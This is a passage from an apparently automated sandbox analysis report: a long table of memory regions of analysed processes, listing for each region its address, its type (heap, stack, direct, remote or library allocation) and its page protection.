page execute and read and write
|
||
|
4C1C000
|
heap
|
page read and write
|
||
|
2F4C000
|
heap
|
page read and write
|
||
|
1DB48A40000
|
heap
|
page read and write
|
||
|
1DB4B2FC000
|
trusted library allocation
|
page read and write
|
||
|
4C0B000
|
heap
|
page read and write
|
||
|
2232989A000
|
heap
|
page read and write
|
||
|
7D00000
|
direct allocation
|
page read and write
|
||
|
336E000
|
stack
|
page read and write
|
||
|
7530000
|
direct allocation
|
page read and write
|
||
|
1DB62AF9000
|
heap
|
page read and write
|
||
|
23AB6000
|
unclassified section
|
page execute and read and write
|
||
|
28AC000
|
stack
|
page read and write
|
||
|
74DB000
|
stack
|
page read and write
|
||
|
292F000
|
stack
|
page read and write
|
||
|
4C27000
|
heap
|
page read and write
|
||
|
8AEC000
|
stack
|
page read and write
|
||
|
3540000
|
heap
|
page read and write
|
||
|
328D000
|
heap
|
page read and write
|
||
|
4ECE000
|
stack
|
page read and write
|
||
|
2B59178000
|
stack
|
page read and write
|
||
|
7BF9000
|
heap
|
page read and write
|
||
|
2935000
|
heap
|
page read and write
|
||
|
22329899000
|
heap
|
page read and write
|
||
|
6095000
|
trusted library allocation
|
page read and write
|
||
|
4C32000
|
heap
|
page read and write
|
||
|
2318F000
|
stack
|
page read and write
|
||
|
8BBC000
|
stack
|
page read and write
|
||
|
7BFE000
|
heap
|
page read and write
|
||
|
302C000
|
heap
|
page read and write
|
||
|
2935000
|
heap
|
page read and write
|
||
|
4C0F000
|
heap
|
page read and write
|
||
|
223299D2000
|
heap
|
page read and write
|
||
|
8C5E000
|
heap
|
page read and write
|
||
|
1DB48AF0000
|
heap
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
44A0000
|
heap
|
page read and write
|
||
|
223299B0000
|
heap
|
page read and write
|
||
|
1DB4A4B0000
|
trusted library allocation
|
page read and write
|
||
|
4C08000
|
heap
|
page read and write
|
||
|
22329898000
|
heap
|
page read and write
|
||
|
4E71000
|
heap
|
page read and write
|
||
|
4990000
|
heap
|
page read and write
|
||
|
4C20000
|
heap
|
page read and write
|
||
|
8A60000
|
direct allocation
|
page read and write
|
||
|
236BA000
|
heap
|
page read and write
|
||
|
4D70000
|
trusted library allocation
|
page read and write
|
||
|
1DB62AFB000
|
heap
|
page read and write
|
||
|
1DB5AA57000
|
trusted library allocation
|
page read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
223299BC000
|
heap
|
page read and write
|
||
|
22327C30000
|
heap
|
page read and write
|
||
|
351E000
|
stack
|
page read and write
|
||
|
2F43000
|
heap
|
page read and write
|
||
|
9658000
|
direct allocation
|
page execute and read and write
|
||
|
7520000
|
direct allocation
|
page read and write
|
||
|
234AD000
|
stack
|
page read and write
|
||
|
223299DA000
|
heap
|
page read and write
|
||
|
BE58000
|
direct allocation
|
page execute and read and write
|
||
|
799F000
|
heap
|
page read and write
|
||
|
4C1F000
|
heap
|
page read and write
|
||
|
730E000
|
stack
|
page read and write
|
||
|
4C00000
|
trusted library allocation
|
page read and write
|
||
|
2F40000
|
heap
|
page read and write
|
||
|
4D20000
|
trusted library allocation
|
page read and write
|
||
|
33DE000
|
heap
|
page read and write
|
||
|
738E000
|
stack
|
page read and write
|
||
|
2935000
|
heap
|
page read and write
|
||
|
1DB62C10000
|
heap
|
page read and write
|
||
|
44CE000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
1DB4A555000
|
heap
|
page read and write
|
||
|
4C36000
|
heap
|
page read and write
|
||
|
4C0D000
|
heap
|
page read and write
|
||
|
328D000
|
heap
|
page read and write
|
||
|
4C14000
|
heap
|
page read and write
|
||
|
78CE000
|
stack
|
page read and write
|
||
|
7FFD34433000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DB62DC0000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
8E40000
|
direct allocation
|
page read and write
|
||
|
2D08000
|
heap
|
page read and write
|
||
|
4E00000
|
trusted library allocation
|
page read and write
|
||
|
2F4D000
|
heap
|
page read and write
|
||
|
8A30000
|
direct allocation
|
page read and write
|
||
|
4E00000
|
trusted library allocation
|
page read and write
|
||
|
23641000
|
heap
|
page read and write
|
||
|
2E7A000
|
stack
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
1DB5A770000
|
trusted library allocation
|
page read and write
|
||
|
2935000
|
heap
|
page read and write
|
||
|
2394E000
|
heap
|
page read and write
|
||
|
7BF9000
|
heap
|
page read and write
|
||
|
8C4A000
|
heap
|
page read and write
|
||
|
4C09000
|
heap
|
page read and write
|
||
|
22329B33000
|
heap
|
page read and write
|
||
|
1DB62D74000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
2BDA000
|
heap
|
page read and write
|
||
|
2940000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
44E3000
|
heap
|
page read and write
|
||
|
93C47FB000
|
stack
|
page read and write
|
||
|
22329A2C000
|
heap
|
page read and write
|
||
|
2B593FF000
|
stack
|
page read and write
|
||
|
8BD0000
|
heap
|
page read and write
|
||
|
44B8000
|
heap
|
page read and write
|
||
|
1DB4AFAD000
|
trusted library allocation
|
page read and write
|
||
|
4C0E000
|
heap
|
page read and write
|
||
|
88A0000
|
trusted library allocation
|
page read and write
|
||
|
2B58DFE000
|
stack
|
page read and write
|
||
|
2B58FFE000
|
stack
|
page read and write
|
||
|
44A0000
|
heap
|
page read and write
|
||
|
5048000
|
trusted library allocation
|
page read and write
|
||
|
4C37000
|
heap
|
page read and write
|
||
|
2934000
|
heap
|
page read and write
|
||
|
7922000
|
heap
|
page read and write
|
||
|
22329A24000
|
heap
|
page read and write
|
||
|
238DB000
|
heap
|
page read and write
|
||
|
22329AD2000
|
heap
|
page read and write
|
||
|
4E71000
|
heap
|
page read and write
|
||
|
1DB48E15000
|
heap
|
page read and write
|
||
|
2324E000
|
stack
|
page read and write
|
||
|
1DB62D30000
|
heap
|
page read and write
|
||
|
4C09000
|
heap
|
page read and write
|
||
|
22329A30000
|
heap
|
page read and write
|
||
|
2960000
|
heap
|
page read and write
|
||
|
7ED0000
|
direct allocation
|
page read and write
|
||
|
223299C4000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
7188000
|
remote allocation
|
page execute and read and write
|
||
|
1DB62DDC000
|
heap
|
page read and write
|
||
|
300A000
|
heap
|
page read and write
|
||
|
8A20000
|
direct allocation
|
page read and write
|
||
|
48C0000
|
trusted library allocation
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
22327AEC000
|
heap
|
page read and write
|
||
|
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
|
5F56000
|
trusted library allocation
|
page read and write
|
||
|
4C09000
|
heap
|
page read and write
|
||
|
4C0D000
|
heap
|
page read and write
|
||
|
238AB000
|
heap
|
page read and write
|
||
|
4C2A000
|
heap
|
page read and write
|
||
|
3F88000
|
remote allocation
|
page execute and read and write
|
||
|
236B9000
|
heap
|
page read and write
|
||
|
44C1000
|
heap
|
page read and write
|
||
|
28C3000
|
stack
|
page read and write
|
||
|
7BF9000
|
heap
|
page read and write
|
||
|
1DB4B2E9000
|
trusted library allocation
|
page read and write
|
||
|
784E000
|
stack
|
page read and write
|
||
|
223299F5000
|
heap
|
page read and write
|
||
|
22327B0F000
|
heap
|
page read and write
|
||
|
7FFD34432000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
|
4F52000
|
trusted library allocation
|
page read and write
|
||
|
7E60000
|
direct allocation
|
page read and write
|
||
|
2392D000
|
heap
|
page read and write
|
||
|
2FA0000
|
heap
|
page readonly
|
||
|
23741000
|
heap
|
page read and write
|
||
|
7EB0000
|
direct allocation
|
page read and write
|
||
|
2391B000
|
heap
|
page read and write
|
||
|
7D20000
|
heap
|
page read and write
|
||
|
4EF1000
|
trusted library allocation
|
page read and write
|
||
|
2BDA000
|
heap
|
page read and write
|
||
|
22327B10000
|
heap
|
page read and write
|
||
|
22329AB5000
|
heap
|
page read and write
|
||
|
223298A4000
|
heap
|
page read and write
|
||
|
78F0000
|
heap
|
page read and write
|
||
|
3370000
|
heap
|
page read and write
|
||
|
22327AAE000
|
heap
|
page read and write
|
||
|
7D25000
|
heap
|
page read and write
|
||
|
22329AE0000
|
heap
|
page read and write
|
||
|
238AB000
|
heap
|
page read and write
|
||
|
23560000
|
unclassified section
|
page execute and read and write
|
||
|
4E40000
|
heap
|
page execute and read and write
|
||
|
2B58E7C000
|
stack
|
page read and write
|
||
|
7C3C000
|
heap
|
page read and write
|
||
|
22329A0F000
|
heap
|
page read and write
|
||
|
22329A24000
|
heap
|
page read and write
|
||
|
7C09000
|
heap
|
page read and write
|
||
|
1DB48B97000
|
heap
|
page read and write
|
||
|
4C20000
|
heap
|
page read and write
|
||
|
4D50000
|
trusted library allocation
|
page read and write
|
||
|
4E1E000
|
stack
|
page read and write
|
||
|
4C0F000
|
heap
|
page read and write
|
||
|
22327AFB000
|
heap
|
page read and write
|
||
|
2314E000
|
stack
|
page read and write
|
||
|
22329A3E000
|
heap
|
page read and write
|
||
|
7550000
|
direct allocation
|
page read and write
|
||
|
33D2000
|
heap
|
page read and write
|
||
|
44DE000
|
heap
|
page read and write
|
||
|
7C08000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
7D30000
|
trusted library allocation
|
page read and write
|
||
|
7E40000
|
direct allocation
|
page read and write
|
||
|
7B6E000
|
stack
|
page read and write
|
||
|
7BEE000
|
stack
|
page read and write
|
||
|
237BA000
|
heap
|
page read and write
|
||
|
29B0000
|
heap
|
page read and write
|
||
|
44A1000
|
heap
|
page read and write
|
||
|
1DB4A500000
|
trusted library allocation
|
page read and write
|
||
|
223299AD000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
223299CF000
|
heap
|
page read and write
|
||
|
7FFD3443D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4E00000
|
trusted library allocation
|
page read and write
|
||
|
4D80000
|
heap
|
page readonly
|
||
|
7BFE000
|
heap
|
page read and write
|
||
|
22329A1B000
|
heap
|
page read and write
|
||
|
7660000
|
heap
|
page read and write
|
||
|
44C0000
|
heap
|
page read and write
|
||
|
7FFD345D0000
|
trusted library allocation
|
page read and write
|
||
|
7B70000
|
direct allocation
|
page read and write
|
||
|
8880000
|
trusted library allocation
|
page read and write
|
||
|
4C27000
|
heap
|
page read and write
|
||
|
728E000
|
stack
|
page read and write
|
||
|
2334F000
|
stack
|
page read and write
|
||
|
1DB48A50000
|
heap
|
page read and write
|
||
|
2934000
|
heap
|
page read and write
|
||
|
4C1F000
|
heap
|
page read and write
|
||
|
4D30000
|
trusted library allocation
|
page read and write
|
||
|
44A1000
|
heap
|
page read and write
|
||
|
88C0000
|
trusted library allocation
|
page read and write
|
||
|
7400000
|
heap
|
page execute and read and write
|
||
|
23833000
|
heap
|
page read and write
|
||
|
2B58EFE000
|
stack
|
page read and write
|
||
|
2D1E000
|
heap
|
page read and write
|
||
|
1DB4B31A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34660000
|
trusted library allocation
|
page read and write
|
||
|
2935000
|
heap
|
page read and write
|
||
|
7FFD34670000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
|
93C46FC000
|
stack
|
page read and write
|
||
|
4C23000
|
heap
|
page read and write
|
||
|
2B592FE000
|
stack
|
page read and write
|
||
|
22329A2C000
|
heap
|
page read and write
|
||
|
2934000
|
heap
|
page read and write
|
||
|
2934000
|
heap
|
page read and write
|
||
|
7C13000
|
heap
|
page read and write
|
||
|
2BDA000
|
heap
|
page read and write
|
||
|
236B8000
|
heap
|
page read and write
|
||
|
8BF0000
|
heap
|
page read and write
|
||
|
4C0D000
|
heap
|
page read and write
|
||
|
8767000
|
stack
|
page read and write
|
||
|
328E000
|
heap
|
page read and write
|
||
|
1DB4A7E4000
|
trusted library allocation
|
page read and write
|
||
|
1DB4A761000
|
trusted library allocation
|
page read and write
|
||
|
2D21000
|
heap
|
page read and write
|
||
|
22327B0B000
|
heap
|
page read and write
|
||
|
1DB4C444000
|
trusted library allocation
|
page read and write
|
||
|
4EE0000
|
heap
|
page read and write
|
||
|
2950000
|
heap
|
page readonly
|
||
|
7D20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
|
4C1F000
|
heap
|
page read and write
|
||
|
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34615000
|
trusted library allocation
|
page read and write
|
||
|
22327B0D000
|
heap
|
page read and write
|
||
|
22327AEC000
|
heap
|
page read and write
|
||
|
1DB48E10000
|
heap
|
page read and write
|
||
|
4AFE000
|
stack
|
page read and write
|
||
|
1DB4ABDC000
|
trusted library allocation
|
page read and write
|
||
|
2F88000
|
stack
|
page read and write
|
||
|
2BDA000
|
heap
|
page read and write
|
||
|
22327A9F000
|
heap
|
page read and write
|
||
|
2934000
|
heap
|
page read and write
|
||
|
22329AE0000
|
heap
|
page read and write
|
||
|
223299DA000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
7E80000
|
direct allocation
|
page read and write
|
||
|
22327AEE000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
579B000
|
trusted library allocation
|
page read and write
|
||
|
2232989C000
|
heap
|
page read and write
|
||
|
23A60000
|
unclassified section
|
page execute and read and write
|
||
|
2934000
|
heap
|
page read and write
|
||
|
23733000
|
heap
|
page read and write
|
||
|
2BDA000
|
heap
|
page read and write
|
||
|
93C41FE000
|
stack
|
page read and write
|
||
|
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
|
44A0000
|
heap
|
page read and write
|
||
|
2935000
|
heap
|
page read and write
|
||
|
223299EF000
|
heap
|
page read and write
|
||
|
78E8000
|
trusted library allocation
|
page read and write
|
||
|
1DB4C02C000
|
trusted library allocation
|
page read and write
|
||
|
4E70000
|
heap
|
page read and write
|
||
|
22327A10000
|
heap
|
page read and write
|
||
|
223299B6000
|
heap
|
page read and write
|
||
|
7FFD346A0000
|
trusted library allocation
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
7BF9000
|
heap
|
page read and write
|
||
|
296A000
|
heap
|
page read and write
|
||
|
8EA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7EA0000
|
direct allocation
|
page read and write
|
||
|
4C0F000
|
heap
|
page read and write
|
||
|
4E00000
|
trusted library allocation
|
page read and write
|
||
|
22329890000
|
heap
|
page read and write
|
||
|
1DB62DDA000
|
heap
|
page read and write
|
||
|
4E28000
|
trusted library allocation
|
page read and write
|
||
|
2B589A3000
|
stack
|
page read and write
|
||
|
4512000
|
heap
|
page read and write
|
||
|
28BF000
|
stack
|
page read and write
|
||
|
2EEE000
|
unkown
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
2B59E4E000
|
stack
|
page read and write
|
||
|
4C0B000
|
heap
|
page read and write
|
||
|
223298A4000
|
heap
|
page read and write
|
||
|
22327A9F000
|
heap
|
page read and write
|
||
|
22327B42000
|
heap
|
page read and write
|
||
|
88D0000
|
trusted library allocation
|
page read and write
|
||
|
22329A24000
|
heap
|
page read and write
|
||
|
7D80000
|
trusted library allocation
|
page read and write
|
||
|
288C000
|
stack
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
4C1F000
|
heap
|
page read and write
|
||
|
87FD000
|
stack
|
page read and write
|
||
|
7FFD346B0000
|
trusted library allocation
|
page read and write
|
||
|
8840000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD345EA000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34440000
|
trusted library allocation
|
page read and write
|
||
|
22327B22000
|
heap
|
page read and write
|
||
|
788E000
|
stack
|
page read and write
|
||
|
7FFD34680000
|
trusted library allocation
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
4579000
|
heap
|
page read and write
|
||
|
22327B42000
|
heap
|
page read and write
|
||
|
22329A90000
|
heap
|
page read and write
|
||
|
2934000
|
heap
|
page read and write
|
||
|
4D00000
|
trusted library section
|
page read and write
|
||
|
22329AB7000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
4DDE000
|
stack
|
page read and write
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
2B59F4B000
|
stack
|
page read and write
|
||
|
2BC0000
|
heap
|
page read and write
|
||
|
4ED0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8860000
|
trusted library allocation
|
page read and write
|
||
|
22329A24000
|
heap
|
page read and write
|
||
|
93C4AFB000
|
stack
|
page read and write
|
||
|
8C24000
|
heap
|
page read and write
|
||
|
4C08000
|
heap
|
page read and write
|
||
|
4C1F000
|
heap
|
page read and write
|
||
|
22327B33000
|
heap
|
page read and write
|
||
|
4D39000
|
trusted library allocation
|
page read and write
|
||
|
2B58D7F000
|
stack
|
page read and write
|
||
|
22327BE0000
|
remote allocation
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
44BF000
|
heap
|
page read and write
|
||
|
2346C000
|
stack
|
page read and write
|
||
|
7C40000
|
trusted library allocation
|
page execute and read and write
|
||
|
23741000
|
heap
|
page read and write
|
||
|
8870000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
7D40000
|
trusted library allocation
|
page read and write
|
||
|
22329891000
|
heap
|
page read and write
|
||
|
22327A61000
|
heap
|
page read and write
|
||
|
2BDA000
|
heap
|
page read and write
|
||
|
7C30000
|
trusted library allocation
|
page read and write
|
||
|
23A3D000
|
unclassified section
|
page execute and read and write
|
||
|
2BD7000
|
heap
|
page read and write
|
||
|
44DF000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
2EC0000
|
heap
|
page read and write
|
||
|
8C0C000
|
heap
|
page read and write
|
||
|
1DB5AA48000
|
trusted library allocation
|
page read and write
|
||
|
2B58F7E000
|
stack
|
page read and write
|
||
|
1DB4C4F6000
|
trusted library allocation
|
page read and write
|
||
|
4C38000
|
heap
|
page read and write
|
||
|
44B6000
|
heap
|
page read and write
|
||
|
1DB4A750000
|
heap
|
page execute and read and write
|
||
|
734E000
|
stack
|
page read and write
|
||
|
22327A81000
|
heap
|
page read and write
|
||
|
3210000
|
heap
|
page read and write
|
||
|
1DB48B2F000
|
heap
|
page read and write
|
||
|
2BDA000
|
heap
|
page read and write
|
||
|
4D40000
|
trusted library allocation
|
page read and write
|
||
|
1DB4C54C000
|
trusted library allocation
|
page read and write
|
||
|
761D000
|
stack
|
page read and write
|
||
|
223299F5000
|
heap
|
page read and write
|
||
|
4C22000
|
heap
|
page read and write
|
||
|
8850000
|
heap
|
page read and write
|
||
|
23590000
|
direct allocation
|
page read and write
|
||
|
6081000
|
trusted library allocation
|
page read and write
|
||
|
7C70000
|
trusted library allocation
|
page read and write
|
||
|
1DB48AE6000
|
heap
|
page read and write
|
||
|
93C45FE000
|
stack
|
page read and write
|
||
|
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
|
8780000
|
trusted library allocation
|
page read and write
|
||
|
C858000
|
direct allocation
|
page execute and read and write
|
||
|
4C1F000
|
heap
|
page read and write
|
||
|
1DB48A70000
|
heap
|
page read and write
|
||
|
1DB4C4F2000
|
trusted library allocation
|
page read and write
|
||
|
8DE0000
|
trusted library allocation
|
page read and write
|
||
|
2B9E000
|
unkown
|
page read and write
|
||
|
4C08000
|
heap
|
page read and write
|
||
|
8E30000
|
direct allocation
|
page read and write
|
||
|
22329A1B000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
223299EF000
|
heap
|
page read and write
|
||
|
4C08000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
22329AAB000
|
heap
|
page read and write
|
||
|
883E000
|
stack
|
page read and write
|
||
|
4C3D000
|
heap
|
page read and write
|
||
|
22329A2C000
|
heap
|
page read and write
|
||
|
4C0F000
|
heap
|
page read and write
|
||
|
1DB62AA0000
|
heap
|
page read and write
|
||
|
22329B65000
|
heap
|
page read and write
|
||
|
7FFD34516000
|
trusted library allocation
|
page execute and read and write
|
||
|
22327BE0000
|
remote allocation
|
page read and write
|
||
|
22327AC8000
|
heap
|
page read and write
|
||
|
22329A30000
|
heap
|
page read and write
|
||
|
1DB4A557000
|
heap
|
page read and write
|
||
|
238EB000
|
heap
|
page read and write
|
||
|
22327B33000
|
heap
|
page read and write
|
||
|
7FFD34617000
|
trusted library allocation
|
page read and write
|
||
|
233DB000
|
stack
|
page read and write
|
||
|
44A9000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
4C27000
|
heap
|
page read and write
|
||
|
2930000
|
heap
|
page read and write
|
||
|
4C4E000
|
heap
|
page read and write
|
||
|
44CA000
|
heap
|
page read and write
|
||
|
8AA0000
|
heap
|
page read and write
|
||
|
48C9000
|
heap
|
page read and write
|
||
|
22327B33000
|
heap
|
page read and write
|
||
|
4C48000
|
heap
|
page read and write
|
||
|
328E000
|
heap
|
page read and write
|
||
|
4991000
|
heap
|
page read and write
|
||
|
22327BE0000
|
remote allocation
|
page read and write
|
||
|
759D000
|
stack
|
page read and write
|
||
|
22329A37000
|
heap
|
page read and write
|
||
|
239E0000
|
unclassified section
|
page execute and read and write
|
||
|
44B6000
|
heap
|
page read and write
|
||
|
7D60000
|
trusted library allocation
|
page read and write
|
||
|
223299AD000
|
heap
|
page read and write
|
||
|
44B0000
|
heap
|
page read and write
|
||
|
7FFD34600000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BDA000
|
heap
|
page read and write
|
||
|
2392D000
|
heap
|
page read and write
|
||
|
4C09000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
1DB4A6C0000
|
heap
|
page execute and read and write
|
||
|
4C14000
|
heap
|
page read and write
|
||
|
8C02000
|
heap
|
page read and write
|
||
|
2BDA000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
223299DA000
|
heap
|
page read and write
|
||
|
4C10000
|
heap
|
page read and write
|
||
|
765D000
|
stack
|
page read and write
|
||
|
223299B1000
|
heap
|
page read and write
|
||
|
22327B3D000
|
heap
|
page read and write
|
||
|
332E000
|
stack
|
page read and write
|
||
|
22329A0F000
|
heap
|
page read and write
|
||
|
22329B6B000
|
heap
|
page read and write
|
||
|
4A38000
|
heap
|
page read and write
|
||
|
7E50000
|
direct allocation
|
page read and write
|
||
|
7B80000
|
heap
|
page read and write
|
||
|
22329A15000
|
heap
|
page read and write
|
||
|
4991000
|
heap
|
page read and write
|
||
|
22329A30000
|
heap
|
page read and write
|
||
|
79A7000
|
heap
|
page read and write
|
||
|
223299EF000
|
heap
|
page read and write
|
||
|
2B591F7000
|
stack
|
page read and write
|
||
|
1DB62DE6000
|
heap
|
page read and write
|
||
|
2E84000
|
heap
|
page read and write
|
||
|
22329540000
|
heap
|
page read and write
|
||
|
4FAE000
|
stack
|
page read and write
|
||
|
29F0000
|
direct allocation
|
page read and write
|
||
|
2934000
|
heap
|
page read and write
|
||
|
2CE0000
|
heap
|
page read and write
|
||
|
2B58CFE000
|
stack
|
page read and write
|
||
|
7DDB000
|
stack
|
page read and write
|
||
|
8B2B000
|
stack
|
page read and write
|
||
|
780E000
|
stack
|
page read and write
|
||
|
7C07000
|
heap
|
page read and write
|
||
|
1DB48AE1000
|
heap
|
page read and write
|
||
|
2934000
|
heap
|
page read and write
|
||
|
44A1000
|
heap
|
page read and write
|
||
|
1DB4B30F000
|
trusted library allocation
|
page read and write
|
||
|
7D0B000
|
stack
|
page read and write
|
||
|
4C0D000
|
heap
|
page read and write
|
||
|
4D90000
|
heap
|
page read and write
|
||
|
1DB4A550000
|
heap
|
page read and write
|
||
|
93C48FF000
|
stack
|
page read and write
|
||
|
8DF0000
|
trusted library allocation
|
page read and write
|
||
|
3520000
|
heap
|
page read and write
|
||
|
22327A58000
|
heap
|
page read and write
|
||
|
1DB4A470000
|
trusted library allocation
|
page read and write
|
||
|
8BC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C1B000
|
heap
|
page read and write
|
||
|
1DB4C5F4000
|
trusted library allocation
|
page read and write
|
||
|
7931000
|
heap
|
page read and write
|
||
|
22329A15000
|
heap
|
page read and write
|
||
|
2934000
|
heap
|
page read and write
|
||
|
93C44FF000
|
stack
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
22329A0F000
|
heap
|
page read and write
|
||
|
2B58C7D000
|
stack
|
page read and write
|
||
|
48EF000
|
stack
|
page read and write
|
||
|
7E90000
|
direct allocation
|
page read and write
|
||
|
235A6000
|
direct allocation
|
page execute and read and write
|
||
|
7C13000
|
heap
|
page read and write
|
||
|
2BD9000
|
heap
|
page read and write
|
||
|
8E20000
|
trusted library allocation
|
page read and write
|
||
|
7C08000
|
heap
|
page read and write
|
||
|
44B6000
|
heap
|
page read and write
|
||
|
8A10000
|
trusted library allocation
|
page read and write
|
||
|
78E0000
|
trusted library allocation
|
page read and write
|
||
|
7230000
|
trusted library allocation
|
page read and write
|
||
|
1DB4AED2000
|
trusted library allocation
|
page read and write
|
||
|
23A39000
|
unclassified section
|
page execute and read and write
|
||
|
4C27000
|
heap
|
page read and write
|
||
|
7EC0000
|
direct allocation
|
page read and write
|
||
|
749D000
|
stack
|
page read and write
|
||
|
22329991000
|
heap
|
page read and write
|
||
|
1DB48B2A000
|
heap
|
page read and write
|
||
|
7DF4CBD20000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C14000
|
heap
|
page read and write
|
||
|
22329A2A000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
1DB62B88000
|
heap
|
page read and write
|
||
|
1DB4ADAD000
|
trusted library allocation
|
page read and write
|
||
|
2BDB000
|
heap
|
page read and write
|
||
|
223299F5000
|
heap
|
page read and write
|
||
|
2B5937E000
|
stack
|
page read and write
|
||
|
22329A59000
|
heap
|
page read and write
|
||
|
22327A7C000
|
heap
|
page read and write
|
||
|
1DB4A4C0000
|
heap
|
page read and write
|
||
|
29D5000
|
stack
|
page read and write
|
||
|
22329ABE000
|
heap
|
page read and write
|
||
|
4C0F000
|
heap
|
page read and write
|
||
|
1DB4B0F3000
|
trusted library allocation
|
page read and write
|
||
|
1DB4A4D0000
|
trusted library allocation
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
|
2330E000
|
stack
|
page read and write
|
||
|
236B8000
|
heap
|
page read and write
|
||
|
7FFD344EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7C09000
|
heap
|
page read and write
|
||
|
1DB630E0000
|
heap
|
page read and write
|
||
|
2CEA000
|
heap
|
page read and write
|
||
|
7FFD34640000
|
trusted library allocation
|
page read and write
|
||
|
2F4C000
|
heap
|
page read and write
|
||
|
4CF0000
|
trusted library section
|
page read and write
|
||
|
7FFD34690000
|
trusted library allocation
|
page read and write
|
||
|
4C27000
|
heap
|
page read and write
|
||
|
22329893000
|
heap
|
page read and write
|
||
|
44A1000
|
heap
|
page read and write
|
||
|
1DB5A761000
|
trusted library allocation
|
page read and write
|
||
|
7CCD000
|
stack
|
page read and write
|
||
|
22327B1C000
|
heap
|
page read and write
|
||
|
4C09000
|
heap
|
page read and write
|
||
|
88B0000
|
trusted library allocation
|
page read and write
|
||
|
22327B1F000
|
heap
|
page read and write
|
||
|
7FFD34434000
|
trusted library allocation
|
page read and write
|
||
|
7D10000
|
direct allocation
|
page read and write
|
||
|
1DB62D6D000
|
heap
|
page read and write
|
||
|
223299DD000
|
heap
|
page read and write
|
||
|
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
|
22327B14000
|
heap
|
page read and write
|
||
|
4D24000
|
trusted library allocation
|
page read and write
|
||
|
1DB4A430000
|
heap
|
page read and write
|
||
|
2232989B000
|
heap
|
page read and write
|
||
|
22327B3E000
|
heap
|
page read and write
|
||
|
8DD0000
|
trusted library allocation
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
7BFE000
|
heap
|
page read and write
|
||
|
7670000
|
heap
|
page read and write
|
||
|
231CE000
|
stack
|
page read and write
|
||
|
22329A24000
|
heap
|
page read and write
|
||
|
44B5000
|
heap
|
page read and write
|
||
|
4C1F000
|
heap
|
page read and write
|
||
|
5D88000
|
remote allocation
|
page execute and read and write
|
||
|
44A1000
|
heap
|
page read and write
|
||
|
223299D8000
|
heap
|
page read and write
|
||
|
4480000
|
heap
|
page read and write
|
||
|
4C09000
|
heap
|
page read and write
|
||
|
2934000
|
heap
|
page read and write
|
||
|
44A0000
|
heap
|
page read and write
|
||
|
1DB62B80000
|
heap
|
page read and write
|
||
|
22329A9D000
|
heap
|
page read and write
|
||
|
1DB48AEC000
|
heap
|
page read and write
|
||
|
4990000
|
heap
|
page read and write
|
||
|
7FFD344E6000
|
trusted library allocation
|
page read and write
|
||
|
2B590F6000
|
stack
|
page read and write
|
||
|
44B1000
|
heap
|
page read and write
|
||
|
236BA000
|
heap
|
page read and write
|
||
|
4D52000
|
trusted library allocation
|
page read and write
|
||
|
3283000
|
heap
|
page read and write
|
||
|
4C2A000
|
heap
|
page read and write
|
||
|
44B1000
|
heap
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
4D23000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
